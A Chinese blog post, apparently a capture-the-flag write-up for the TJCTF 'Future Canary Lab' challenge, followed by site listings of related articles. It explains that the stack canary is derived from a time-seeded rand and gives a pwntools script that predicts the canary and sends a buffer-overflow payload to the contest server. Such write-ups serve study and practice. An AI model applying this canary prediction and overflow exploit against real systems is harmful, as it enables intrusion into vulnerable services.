TJCTF之Future Canary Lab

最新推荐文章于 2022-05-18 17:17:08 发布
最新推荐文章于 2022-05-18 17:17:08 发布
阅读量226 收藏
点赞数
分类专栏: exploit pwn Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010334666/article/details/82501858
版权
Linux 同时被 3 个专栏收录
15 篇文章 0 订阅
订阅专栏
pwn
10 篇文章 0 订阅
订阅专栏
exploit
8 篇文章 0 订阅
订阅专栏

博客已经转移

https://noone-hub.github.io/

题目原以为很简单,然后做起来才发觉自己这个知识点又不知道,srand函数是按照特定算法计算出seed来的,题目用的是当前时间,也就是说我们连接上他服务器,然后这时候生成的seed跟他就一样了,然后rand也就得出来了,题目不难,就是一个知识点,看wp后自己写的代码贴上

 

#!/usr/bin/env python
# coding=utf-8
from pwn import *
import time
import subprocess

while True:
    io=remote('problem1.tjctf.org',8000)
    seed=int(time.time())
    myio=process(argv=['rand',str(seed)],executable='./rand')
    s=myio.recv()
    srand=[]
    for i in s:
        srand=s.split('\n')
    srand=srand[:-1]
    cookie=''.join([p32(int(x)) for x in srand])
    print cookie
    #p32(0x0) replace j A*64 replace gets-array 
    #address=hex(0xFFFFFFFF+1-0xdeadbeef+0xA)
    payload= "A" * 64 +cookie +p32(0x0)+p32(0x2152411b)
    log.info('Payload : ' + payload)
    io.sendlineafter("What is your name?\n",payload)
    log.success(io.recv())
    c=raw_input("Please input anykey")

 

NoOneGroup
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
tjctf2018部分题解
木槿华年的博客
08-17 762
本文由多位大佬的题解整理而来,仅供学习参考 RC4获得了L - 40分 Alphabet = #_23456789abcdefghijklmnopqrstuvwxyz Key = pq_xc589r3nb#mgjtkh7w2dlfvy4eaoi6uzs 密文:wpwt#5ng4_qbitp#8mq59r_g866c4t59c6vy6tisj4af6bprfnbd_wrq2wjmr4ld_s...
[tjctf 2023] crypto,pwn,rev部分
weixin_52640415的博客
05-28 1613
三块没有一个通关的。rev差两个,crypto.pwn都差一题。
TJCTF之Bad Cipher
NoOneGroup
09-02 335
博客已经转移 https://noone-hub.github.io/ 经过两三天的看代码,学会了好多python语法,懂了好多python的东西,特此来记录下,不过通过题目学习到的更多是一种思维,还得多谢大佬的writeup,一边看一边问,大佬已经没耐心了,然后自己琢磨发觉大佬的writeup也出了点小瑕疵,特此记录下吧。 因为现在刚完成的是后面一道题,所以先发下后面一道题的思路 题目有...
TJCTF 2022 Forenscis
wha1e的博客
05-18 261
TJCTF 2022 Forenscis
2019年CTF4月比赛记录(二):“掘安杯”、TJCTF部分Web题目writeup与重解
極品━═☆宏的博客
04-14 2265
写在前面的: 这次比赛总体上还好吧,虽然并没有做出特别多的题目,只有8道,但是经过这个比赛,包括后面的复现,还是能学到点东西的,对自己而言也算是一种提升吧。起码相较于两个月前还是能感觉到自己的进步的。 具体的writeup官方也给出来了,我只在这里写出自己的做题记录,可能有的比较复杂,还望见谅。 比赛时间:2019年4月6日 复现时间:2019年4月8日 一、Writeup:(基本上是密码、MIS...
HttpCanary.pem证书
07-26
安装HttpCanary之后,需要安装证书,有些手机需要在设置里自行安装,需要导入此文件进行安装。
HttpCanary_3.3.6.zip
04-29
HttpCanary是一款强大的网络封包分析工具,专为Android用户设计,用于监控和抓取应用程序与服务器之间的HTTP和HTTPS通信。在标题“HttpCanary_3.3.6.zip”中,我们可以推断出这是HttpCanary软件的一个特定版本,即...
httpcanary 小黄鸟
07-10
httpcanary 小黄鸟 安卓抓包工具
httpcanary9.2.8.1.apk
08-21
Httpcanary破解版是一款主打安卓手机抓包功能的应用。可以帮你快捷的在手机上进行抓包应用,丰富的工具给你更好的体验,该版本已经全面解锁高级专业版功能,给你带来更好的体验。
HttpCanary高级版.apk
11-28
HttpCanary高级版
tjctf-2015:TJCTF 2015 的文章
06-03
TJCTF - in/s/ane 问题解决方案,由 in/s/ane 团队在挑战赛期间。 我们排名第二。
通过fork进程爆破canary
weixin_30763455的博客
05-31 733
1.1.1 通过fork进程爆破canary ⑴.原理分析: 对fork而言,作用相当于自我复制,每一次复制出来的程序,内存布局都是一样的,当然canary值也一样。那我们就可以逐位爆破,如果程序GG了就说明这一位不对,如果程序正常就可以接着跑下一位,直到跑出正确的canary。 另外有一点就是canary的最低位是0x00,这么做为了防止canary的值泄漏。比如在canary上面是...
TJCTF之 Tilted Troop
NoOneGroup
08-30 388
博客已经转移 https://noone-hub.github.io/ 倒不是说这题目有多难,是我太菜,从中学到了点东西,发出来理清下思路,记录下 先贴上主函数代码 int __cdecl main(int argc, const char **argv, const char **envp) { __gid_t rgid; // ST04_4@1 char *v4; // rb...
TJCTF之Online Banking
NoOneGroup
09-13 261
博客已经转移 https://noone-hub.github.io/ 又get到新知识,可以,记录下, 先查看c代码 #include <stdio.h> #include <stdlib.h> #include <string.h> #define PIN_SIZE 4 #define NAME_SIZE 32 int verify_pin(ch...
TJCTF之Bricked Binary
NoOneGroup
11-17 166
博客已经转移 https://noone-hub.github.io/ 毕竟TJCTF非常适合入门,所以每一道题我都拿来练习下,get到新的知识点 hint: Written byevanyeyeye Earlier, I input my flag to thisimageand received 22c15d5f23238a8fff8d299f8e5a1c62 as the o...
2018 moeCTF新生题-----一个菜鸟的部分WP
qq_42192672的博客
10-18 2689
嗯嗯,毕竟我还是个信息安全的小菜鸟,就去看看题目练练手,一起加油吧                                                             MISC BASE64: 这题顾名思义我就去用base64解码了呢 bingo:moectf{b@se64_1s_a_ImPorT@ant_coded_format}   凯撒密码: 啊咧,走了...
TJCTF之Secure Secrets
NoOneGroup
09-11 340
博客已经转移 https://noone-hub.github.io/ 百度你查的到的writeup都是说很简单,然后给代码,对于我等新手很不友好,谷歌搜索可以搜索到详细的writeup,也是解释的一半一半,对于新手也不是很友好,看了个youtube的视频,发觉讲的不错,代码简洁,最后懂了,不过就是全英文的,有点难听懂 回到正题:这道题可以用ida打开,审查代码发觉有格式化字符串漏洞,或者自...
逆向入门系列(2)静态分析工具ida的使用
NoOneGroup
08-28 8100
博客已经转移 https://noone-hub.github.io/ 首 先,ida的下载这个自己可以吧,不会的可以找我要ida6.8版本跟7.0版本,我只有这两个版本,6.8兼容32和64位系统,7.0只兼容64位系统,本文用的是6.8,在linux下,我用wine运行的打开ida后通常是这个界面,点击new 找到你要的文件,linux下的elf文件要选择all files才能找到...
httpcanary抓直播
最新发布
12-19
httpcanary是一款Android平台上的抓包工具,可以用于分析手机App的网络请求和响应数据。如果想要抓取直播的数据,可以通过httpcanary来实现。 首先,用户需要在手机上安装httpcanary应用程序,并且确保手机和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值